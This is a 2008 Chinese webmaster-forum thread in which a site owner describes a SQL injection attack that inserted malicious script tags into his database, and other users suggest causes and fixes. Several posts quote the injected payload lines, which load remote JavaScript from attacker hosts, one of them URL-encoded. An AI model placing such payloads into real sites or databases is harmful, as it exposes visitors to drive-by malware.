落伍者站长论坛 » 网站建设运营(经典区) » 这让我无语！ARP还是SQL注入？

飘越 发表于 2008-5-9 19:54

这让我无语！ARP还是SQL注入？

看看这个无聊的人！一天3次累不累啊。
最近遇到个头疼事
现在是他应该是熟知我们网站的漏洞，知道我什么时候备份 什么时候没备份数据库
数据库被篡改了 数据库表内几乎每行都有一行都被加上了 "></title><script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js></scr
上次是</title></pre>"><scr</title></pre>><script src=http://sb.5252.ws:88/107/1.js></script.这样的代码
两次的代码  打开网页出现病毒报错 Bloodhound.Exploit.182


通知服务器商 把数据库恢复 然后把页面文件全部覆盖 网站就正常了


老天啊 这样我岂不是要把服务器商麻烦死！
在这儿寻高人给我条路吧。。。。。

梁静茹 发表于 2008-5-9 21:14

没错的话
应该是你站点存在注入
但是对付跑不出你密码或是跑出密码找不出你后台
然后直接利用updata 表 set 挂马
挂马的内容就是：<script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js>
----------------
建议你程序弄个通用防注入程序
要是想知道你程序哪里有bug
那就看看IIS日志吧 - -！

codejia 发表于 2008-5-9 22:24

楼主的签名站，关注有两年多了，不错，要是免费的就好了
:P

飘越 发表于 2008-5-10 16:19

有哪位能帮我写个防止 SQL 注入程序么？

目前真的是怀疑被挂马了。。。

<script src=http://%61%2E%6B%61%34%37%2E%75%73/1.js>

梁静茹 发表于 2008-5-10 23:56

[quote]原帖由 [i]飘越[/i] 于 2008-5-10 16:19 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=26065663&ptid=2570403][img]http://www.im286.com/images/common/back.gif[/img][/url]
有哪位能帮我写个防止 SQL 注入程序么？

目前真的是怀疑被挂马了。。。

[/quote]
网上有的
你签名那站吗？不是已经做了防注入 呵呵！

学浪教育 发表于 2008-5-11 00:06

前些时间我一天黑两次哦

et39 发表于 2008-5-11 00:08

比较郁闷。

君子 发表于 2008-5-11 00:15

楼主的站真不错。

pengxing 发表于 2008-5-11 00:43

这个好像最近挺流行啊.注入批量更新 varchar nvarchar text ntext字段的数据

看到好多人问了..

飘越 发表于 2008-5-11 14:09

回复 铁牌 梁静茹 的帖子

是另外一个站.
目前找到了一个后门页面
原程序员自己给自己留的一个 可以匿名上传任何东西的页面
现在还在逐个排查其他页面 包括控件
有人建议我用阿江...不知道成不?
谢谢大家帮小弟的解答:)

ljq 发表于 2008-5-11 15:15

用个搜索木马的东西

梁静茹 发表于 2008-5-16 01:04

关键还是找出程序的漏洞！
然后修补！
要不你天天找人家留的后门
会累死你的！:ohh:

坏小子 发表于 2008-5-16 07:22

可以联系我解决。

cnfly 发表于 2008-5-16 09:50

*** 作者被禁止或删除 内容自动屏蔽 ***

54xiaohou 发表于 2008-5-17 08:36

还行，我以前用过

查看完整版本: 这让我无语！ARP还是SQL注入？